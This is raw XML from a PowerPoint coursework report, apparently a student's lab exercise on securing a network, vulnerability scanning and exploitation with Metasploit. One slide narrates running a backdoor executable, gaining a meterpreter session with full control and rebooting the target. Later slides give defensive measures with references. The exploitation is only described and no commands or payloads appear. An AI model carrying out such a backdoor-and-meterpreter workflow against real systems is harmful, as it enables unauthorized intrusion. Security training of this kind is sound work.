          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8127999">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3306943446"/>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the these screenshots I am running windowsbackdoor.exe</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2662598109"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464368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F19B711-C590-44D1-9AA8-9F143B0E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0C79CF2-6A1C-4636-84CE-ABB2BE191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A5D17DF-AD65-402C-A95C-F13C770C9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D802A6B-83D7-9C65-1D63-BA3A9AEFFF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0477" y="2048078"/>
            <a:ext cx="4814653" cy="2708243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6A8426-F1F6-4FC1-8EB6-1728569911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56863" y="2071805"/>
            <a:ext cx="4814655" cy="2708244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA9EB61C-C25B-6470-FB32-727EC971437B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542229441"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2031998" y="5260109"/>
          <a:ext cx="8128002" cy="914400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8128002">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1557363643"/>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the these screenshots </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>meterpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> is activated, I am in the system with full control and activating ‘’reboot’’. All is done!</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3105404350"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398424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07FC1E-7044-33D0-3DDD-220ECF580229}"/>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Preventive security measures </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D6B85B-9EE4-37CE-7A94-40EC10D31078}"/>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algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Option 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Implement a multi-layered access control system: apply the principle of least privilege, enable two-factor authentication, and conduct regular user access reviews. This will reduce the risk of compromised accounts or unauthorized access to critical system resources. According to the National Cyber Security Centre, it is essential to restrict access to what is strictly necessary and to review privileges whenever roles change (NCSC, 2024).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Option 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Establish a patch and update management process: ensure that all systems, applications, and devices are updated promptly to fix known vulnerabilities. With over 50,000 new vulnerabilities reported as of August 2024, patching remains a crucial activity for closing the doors to attackers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>SentinelOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, 2025).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Option 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Implement network segmentation and centralized monitoring: divide the network into zones based on risk, use filters for inter-segment traffic, and deploy centralized logging and analysis systems. This way, a breach in one segment will not automatically spread throughout the entire system, while early detection helps speed up incident response (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>SentinelOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, 2025).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3367836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80CE8-F354-E166-F46E-FB55F778393B}"/>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61DDAE86-148C-2310-16A4-9E014F8A3A17}"/>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endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>National Cyber Security Centre (2024) *Mitigating malware and ransomware attacks*. Available at: https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks (Accessed: November 2025).</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endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>SentinelOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> (2025) ‘Cyber Security Vulnerabilities: Prevention &amp; Mitigation’, 25 August 2025. Available at: https://www.sentinelone.com/cybersecurity-101/cyber-security-vulnerabilities/ (Accessed: November 2025).</a:t>
            </a:r>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13943614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634</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>49</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Report by Evgeni Manov (2314194)</vt:lpstr>
      <vt:lpstr>Task 1: Brief Secure and Demonstrate the given Network</vt:lpstr>
      <vt:lpstr>Screenshots of connectivity </vt:lpstr>
      <vt:lpstr>Ping the machines L-CD</vt:lpstr>
      <vt:lpstr>Ping the machines S-DC1</vt:lpstr>
      <vt:lpstr>Task 2: Vulnerability assessment screenshot highlight low, medium and high severity</vt:lpstr>
      <vt:lpstr>Task 3: Exploitation  with Metasploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Preventive security measures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Evgeni Manov</dc:creator>
  <cp:lastModifiedBy>Evgeni Manov</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-01T23:50:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-03T01:48:37Z</dcterms:modified>
</cp:coreProperties>
</file>